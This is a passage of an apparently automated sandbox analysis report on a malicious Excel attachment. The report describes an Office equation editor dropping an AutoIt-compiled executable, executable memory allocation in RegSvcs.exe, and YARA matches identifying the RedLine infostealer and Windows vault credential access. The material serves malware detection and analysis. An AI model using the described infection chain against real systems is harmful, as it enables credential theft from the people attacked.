memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_7e78ced3-6
                  Source: OIU.exe, 00000007.00000002.462376240.0000000000C62000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_0efa1f0e-d
                  Source: OIU.exe, 00000007.00000002.462376240.0000000000C62000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_78eabdf2-8
                  Source: OIU.exe, 00000009.00000000.462193481.0000000000C62000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_62c442ec-f
                  Source: OIU.exe, 00000009.00000000.462193481.0000000000C62000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_f77bbe4f-d
                  Source: OIU.exe, 0000000B.00000000.463951101.0000000000C62000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_88cb759e-8
                  Source: OIU.exe, 0000000B.00000000.463951101.0000000000C62000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_fc8bf7c3-9
                  Source: OIU.exe.2.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_00ed84c1-5
                  Source: OIU.exe.2.drString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_ae5f0cf3-4
                  Office equation editor drops PE file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\OIU.exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00C0D5EB: CreateFileW,DeviceIoControl,CloseHandle,3_2_00C0D5EB
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00C01201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,3_2_00C01201
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00C0E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,3_2_00C0E8F6
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00C120463_2_00C12046
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00BA80603_2_00BA8060
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00C082983_2_00C08298
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00BDE4FF3_2_00BDE4FF
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00BD676B3_2_00BD676B
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00C348733_2_00C34873
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00BCCAA03_2_00BCCAA0
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00BACAF03_2_00BACAF0
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00BBCC393_2_00BBCC39
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00BD6DD93_2_00BD6DD9
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00BA91C03_2_00BA91C0
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00BBB1193_2_00BBB119
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00BC13943_2_00BC1394
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00BC17063_2_00BC1706
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00BC781B3_2_00BC781B
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00BC19B03_2_00BC19B0
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00BA79203_2_00BA7920
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00BB997D3_2_00BB997D
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00BC7A4A3_2_00BC7A4A
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00BC7CA73_2_00BC7CA7
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00BC1C773_2_00BC1C77
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00BD9EEE3_2_00BD9EEE
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00C2BE443_2_00C2BE44
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00BC1F323_2_00BC1F32
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_001136703_2_00113670
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 5_2_001D36705_2_001D3670
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 7_2_001536707_2_00153670
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 9_2_002136709_2_00213670
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 11_2_0055367011_2_00553670
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00408C6012_2_00408C60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0040DC1112_2_0040DC11
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00407C3F12_2_00407C3F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00418CCC12_2_00418CCC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00406CA012_2_00406CA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_004028B012_2_004028B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0041A4BE12_2_0041A4BE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0041824412_2_00418244
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0040165012_2_00401650
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00402F2012_2_00402F20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_004193C412_2_004193C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0041878812_2_00418788
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00402F8912_2_00402F89
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00402B9012_2_00402B90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_004073A012_2_004073A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_002ED9A812_2_002ED9A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_002ECD9012_2_002ECD90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_002E103012_2_002E1030
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_002ED0D812_2_002ED0D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_002E0F1812_2_002E0F18
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00CF0BC012_2_00CF0BC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00CF2DF812_2_00CF2DF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00D660F812_2_00D660F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00D62DF812_2_00D62DF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00D6966812_2_00D69668
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00D6884912_2_00D68849
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00D6BD0812_2_00D6BD08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00D664B012_2_00D664B0
                  Source: Order Request1_5_24.xlam.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: String function: 00BC0A30 appears 46 times
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: String function: 00BA9CB3 appears 31 times
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: String function: 00BBF9F2 appears 40 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0040E1D8 appears 44 times
                  Source: sheet1.xml, type: SAMPLEMatched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen, description = detects AutoLoad documents using LegacyDrawing
                  Source: 12.2.RegSvcs.exe.37b7770.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 12.2.RegSvcs.exe.530000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 12.2.RegSvcs.exe.300000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 12.2.RegSvcs.exe.300000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 12.2.RegSvcs.exe.3766458.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 12.2.RegSvcs.exe.300ee8.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 12.2.RegSvcs.exe.300ee8.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 12.2.RegSvcs.exe.b6f2ae.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 12.2.RegSvcs.exe.530000.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 12.2.RegSvcs.exe.b70196.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 12.2.RegSvcs.exe.3766458.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 12.2.RegSvcs.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 12.2.RegSvcs.exe.37b7770.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 12.2.RegSvcs.exe.b6f2ae.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 5.2.OIU.exe.de0000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 3.2.OIU.exe.120000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 12.2.RegSvcs.exe.b70196.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 11.2.OIU.exe.a40000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 7.2.OIU.exe.6e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 12.2.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 9.2.OIU.exe.360000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 00000003.00000002.457795747.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 0000000C.00000002.619916072.0000000000530000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 00000005.00000002.460633124.0000000000DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 0000000C.00000002.619859392.0000000000300000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 00000009.00000002.464011217.0000000000360000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 0000000C.00000002.619889469.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 0000000B.00000002.466866889.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 00000007.00000002.462329527.00000000006E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 12.2.RegSvcs.exe.300ee8.0.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 12.2.RegSvcs.exe.300ee8.0.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                  Source: 12.2.RegSvcs.exe.530000.3.raw.unpack, RsYAkkzVoy.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 12.2.RegSvcs.exe.530000.3.raw.unpack, Kqqzixk.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 12.2.RegSvcs.exe.530000.3.raw.unpack, xROdzGigX.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 12.2.RegSvcs.exe.530000.3.raw.unpack, ywes.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 12.2.RegSvcs.exe.530000.3.raw.unpack, iPVW0zV.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                  Source: 12.2.RegSvcs.exe.530000.3.raw.unpack, 1Pi9sgbHwoV.csCryptographic APIs: 'CreateDecryptor'
                  Source: 12.2.RegSvcs.exe.530000.3.raw.unpack, YUgDfWK2g4.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 12.2.RegSvcs.exe.530000.3.raw.unpack, YUgDfWK2g4.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLSX@42/18@4/3
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00C137B5 GetLastError,FormatMessageW,3_2_00C137B5
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00C010BF AdjustTokenPrivileges,CloseHandle,3_2_00C010BF
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00C016C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,3_2_00C016C3
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00C151CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,3_2_00C151CD
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00C2A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,3_2_00C2A67C
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00C1648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,3_2_00C1648E
                  Source: C:\Users\user\AppData\Roaming\OIU.exeCode function: 3_2_00BA42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,3_2_00BA42A2
